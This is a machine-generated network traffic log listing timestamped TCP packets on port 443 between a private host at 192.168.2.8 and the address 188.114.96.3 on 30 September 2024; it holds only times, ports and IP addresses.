                                                                                                                                                                      Sep 30, 2024 18:19:13.067070007 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.068322897 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.068340063 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.068464994 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.068473101 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.068568945 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.111952066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.147943974 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.147965908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.148097992 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.148108959 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.148159027 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.151180029 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.151201010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.151276112 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.151283026 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.151403904 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.152168989 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.152188063 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.152229071 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.152235031 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.152276993 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153009892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153026104 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153081894 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153090954 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153130054 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153496981 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153512001 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153583050 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153589010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153610945 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153623104 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153901100 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153914928 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.153975964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.153989077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.154038906 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.154220104 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.154234886 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.154297113 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.154304028 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.154345989 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.155931950 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.155946970 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.155985117 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.155991077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.156013966 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.156035900 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.156616926 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.235645056 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.235665083 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.235752106 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.235764027 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.235852957 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.238914013 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.238934040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.239031076 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.239038944 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.239173889 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.239826918 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.239842892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.239892960 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.239901066 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.239950895 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.240756035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.240776062 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.240816116 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.240822077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.240853071 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.240853071 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241134882 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241148949 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241241932 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241249084 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241318941 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241492987 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241509914 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241596937 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241604090 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241667986 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241878986 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241894007 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241930962 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241938114 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.241970062 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.241970062 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.243535042 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.243558884 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.243628025 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.243628025 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.243634939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.243726969 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.323513985 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.323534012 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.323662996 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.323673010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.323731899 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.326879025 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.326899052 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.326988935 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.326997042 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.327059031 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.327672005 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.327692986 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.327797890 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.327804089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.327923059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.328367949 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.328387976 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.328444958 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.328444958 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.328454018 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.328490019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.328777075 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.328793049 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.328893900 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.328901052 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329099894 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.329164982 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329180002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329233885 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.329241991 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329318047 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.329464912 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329482079 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329530954 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.329538107 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.329601049 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.331048012 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.331070900 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.331137896 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.331137896 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.331146002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.331267118 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.411515951 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.411577940 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.411631107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.411631107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.411643028 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.411675930 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.414565086 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.414627075 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.414627075 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.414657116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.414680004 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.414690018 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.415565014 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.415613890 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.415636063 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.415643930 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.415679932 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.415708065 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416055918 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416096926 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416130066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416136980 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416148901 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416177988 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416451931 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416492939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416511059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416517973 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416528940 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416564941 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416564941 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.416945934 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.416985989 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.417010069 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.417016983 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.417037010 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.417047977 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.417315006 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.417357922 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.417370081 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.417387009 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.417423964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.417423964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.418770075 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.418811083 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.418843031 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.418863058 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.418904066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.418904066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.499684095 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.499731064 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.499809027 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.499818087 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.499855042 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.499877930 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.502266884 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.502310991 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.502372026 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.502382040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.502398968 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.502418995 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.503190994 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.503232002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.503281116 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.503281116 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.503290892 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.503336906 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504091978 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504134893 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504158020 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504174948 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504187107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504215956 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504673004 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504713058 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504777908 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504777908 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.504785061 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.504837036 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505085945 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505127907 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505150080 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505157948 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505177021 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505224943 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505301952 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505348921 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505384922 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505390882 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.505403996 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.505450010 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.506563902 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.506632090 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.506712914 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.506764889 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.516783953 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.587244987 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.587264061 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.587405920 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.587419987 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.587491989 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.590158939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.590178013 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.590245962 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.590254068 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.590310097 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.591227055 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.591248035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.591293097 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.591300011 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.591341019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.591341019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.592653036 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.592669010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.592727900 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.592736006 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.592780113 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593002081 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593017101 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593074083 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593076944 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593087912 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593158960 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593158960 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593250990 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593272924 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593321085 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593329906 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593343019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593596935 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593641996 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593668938 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.593671083 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:13.593743086 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.607537031 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:13.607554913 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.114531040 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.114598036 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.114660978 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.122972965 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.123008013 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.592457056 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.592525005 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.593907118 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.593919039 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.594177961 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.596393108 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                      Sep 30, 2024 18:19:14.643394947 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740510941 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740550041 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740585089 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740612030 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                      Sep 30, 2024 18:19:14.740638018 CEST44349709188.114.96.3192.168.2.8
